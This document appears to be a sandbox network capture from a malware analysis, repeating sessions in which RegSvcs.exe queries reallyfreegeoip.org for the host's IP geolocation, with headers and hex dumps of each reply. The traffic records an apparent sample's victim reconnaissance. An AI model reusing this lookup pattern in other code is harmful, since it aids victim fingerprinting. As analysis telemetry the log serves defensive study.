<Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49854	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:30 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878319 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wNMjzM9Bxq6OIyF%2BpAp5pCPBsp%2FFpVzXQNc%2FhO2RuV%2Fnc2xr2lJ5TVC7ipvWonD%2BAuXl%2B9yF11Qj26AWmcc3Xi%2F43dGNo4zPBC8WJ7ULXZlVFvJEoqDxzJjWBX5WOk8Z8ZbVGf6U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001922e5bc842e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1681&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1636771&cwnd=240&unsent_bytes=0&cid=0bdbac1e7ba49c1d&ts=151&x=0"
2025-01-11 02:45:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49863	104.21.64.1	443	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:31 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878320 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nr3k35ZMkXVeD6tM5YibPRZu2ZkFijXjJUg5VhjQ8EvGnkS0UYxOrv0WzfCkO2Owgbh7vJcz2aUkhaVEla7m%2B75uC27kJ95KYLAT%2FU8bDteSrb8QaWmZjHXMugdW7VFdhEnlKm%2B5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90019237dd987c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1951&rtt_var=743&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1462193&cwnd=218&unsent_bytes=0&cid=7c9b0117a0101373&ts=157&x=0"
2025-01-11 02:45:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49875	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:33 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878322 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VIbUo2ErepnAb4DGpZXjb3pxrz8LPV0k0KyaazTYk5OQg8Mbk%2BhyvNjE3C%2FbprO5jMrjZPuAu8O9NhRPtFySJjaCeSSA8WC%2Ft7Y%2FuP%2BaXhnmhKGekhxYap%2F66D54ZQiTF90l4B%2Bv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900192448e048ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1928&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1475492&cwnd=168&unsent_bytes=0&cid=487f38678bc58a5b&ts=179&x=0"
2025-01-11 02:45:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49880	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:34 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:34 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878323 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6lH%2B8McZyM8S05xkg3ZZ2H8pQ2FyPKE9LCMknD5sFNXihEBt2C%2FCmX0qutGF7MlAkB2jpXA5enYily6dF%2BugBpikg4sEo2%2FkZCRNFnY7YszdOjRRzgFnSjka41VjTczMqQ5%2B%2FOKW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001924a5e80de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1643&rtt_var=654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1626740&cwnd=243&unsent_bytes=0&cid=45a08f7a45633549&ts=147&x=0"
2025-01-11 02:45:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49901	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:37 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878326 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smAJ6Xl1Xrxap2NimWxUiNaYIK32kzV08PYPQ1e1lqguy8qc1mKLl%2F3e3LDIZsIFGtx%2FRT%2FxD7MKp74WVCwBssebeUajCx7X5ZE6EmjKcNp028QSYWiFS1nxokhQWIBE%2F7JHX50X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001925a08ba4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1765&min_rtt=1705&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1712609&cwnd=180&unsent_bytes=0&cid=9c314cb0689a01eb&ts=126&x=0"
2025-01-11 02:45:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49919	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:39 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878328 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smUbOGQWMyTlXV6c%2FLR9ZmXXPGQ6%2BBRdzgmb6fTDU%2BXb33NicN6oW5A5jE4vXUmooOTbLUvQTeXhODKKw8zurpMi5eMRmzPedq4gvPXJBq8UbjUNAEGPT29jvhZCZJcfdGL0%2FcTU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900192696fd342e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1738&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1641371&cwnd=240&unsent_bytes=0&cid=848a7eb90f9a67f7&ts=138&x=0"
2025-01-11 02:45:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49937	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:42 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:42 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878331 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sF0KUfkKSFxBK8gaRfm8vM64tHWxuDCadM3Hg%2BGpitbH1uOMyr69wv8bRCYCvW41%2BxDniU8sNSUzau4EkNNqBROPsPqA44VJCrWnDVrPwS1rdHdFmVJsihU%2BBrkcCuRMZD2ynH7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90019279f9dd42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1785&rtt_var=725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1635854&cwnd=240&unsent_bytes=0&cid=6500836e2c7d171a&ts=144&x=0"
2025-01-11 02:45:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49947	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:43 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:45:43 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878332 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uVceTc6Gr1gceInMsn%2FVzqzcZRI3kYORAJfMiFw1zUGm5r73XhuYdiRPX7QhIfXgsLSh64VHsE7KAiU6UBtO3aeQEab2kbc%2F0yEaCwUlglaatRadwgxvPG6O1YCYPFXLO14D%2Fqmf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900192832c7c7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1463659&cwnd=218&unsent_bytes=0&cid=177b4199b3987131&ts=161&x=0"
2025-01-11 02:45:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49959	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:45 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878334 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlN9Ww72BXsoHjpk5DDBzE0a4J3pA7uW8MitdAIjyGDImawTdO3fOH1JrhCl%2BF94%2BysDS2mcptwzaprT%2B%2FraELaS%2BcTdrMoIz7YWJTF8WS4Z%2BdtBQzN1tGpuMKXuvwRwv5TPsqxt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001928c8e19c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1559&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1793611&cwnd=155&unsent_bytes=0&cid=141e21d45da44fab&ts=158&x=0"
2025-01-11 02:45:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49978	104.21.64.1	443	8144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:45:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:45:47 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1878336 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8yQLVpHj%2BeZ1%2B4%2FZ90hZUfzMCDPIB9i8Re%2BxudkFhmP0lm2005peG7zv5qXoEISf1pjNN9ueQyW7A0FirFviuYEmvNL05i1gYGnA39vjU089tcUSLsDokJI%2B1g8%2F2rqIQ5ahtPiQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001929c1a5c7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2019&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1418853&cwnd=218&unsent_bytes=0&cid=9add26cd04055969&ts=154&x=0"
